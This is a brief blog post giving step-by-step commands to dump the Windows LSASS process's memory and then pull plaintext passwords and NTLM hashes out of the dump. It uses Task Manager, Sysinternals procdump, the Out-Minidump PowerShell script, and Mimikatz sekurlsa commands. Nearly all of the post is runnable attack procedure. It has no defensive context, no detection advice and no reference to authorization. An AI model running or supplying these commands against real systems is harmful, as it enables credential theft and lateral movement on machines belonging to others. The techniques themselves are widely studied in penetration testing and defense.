Post

LSASS Dumping

Posted Updated
By Alexander Wells
1 min read

Create a dump file of lsass process using multiple different techniques.

  1. Task Manager
  2. Procdump
  3. Minidump
  4. Extract Passwords/Hashes from Dump File with Mimikatz


Task Manager

Create Dump File

  1. Open Task Manger and locate the LSASS process.
  2. It will be called lsass.exe or Local Security Authority Process.
  3. Right click on the process and select Create dump file.


Procdump

Download Tools

Download Sysinternals Suite from Microsoft here.

Dump LSASS

Run the following command in an Admin command prompt:

1

procdump64.exe -ma lsass.exe lsass.dmp


Minidump

Download Minidump

Download the required script from Github here, or a local copy can be found here.

Import & Run Minidump

Import Minidump module:

1

Import-module .\Out-Minidump.ps1

Run the module and dump the process:

1

Get-Process lsass | Out-Minidump


Extract Passwords/Hashes from Dump File with Mimikatz

Download Mimikatz from GitHub here.

Open mimikatz.exe and run:

1
2

sekurlsa::minidump lsass.dmp
sekurlsa::logonPasswords
security, windows
security windows lsass passwords hashes ntlm mimikatz
This post is licensed under CC BY 4.0 by the author.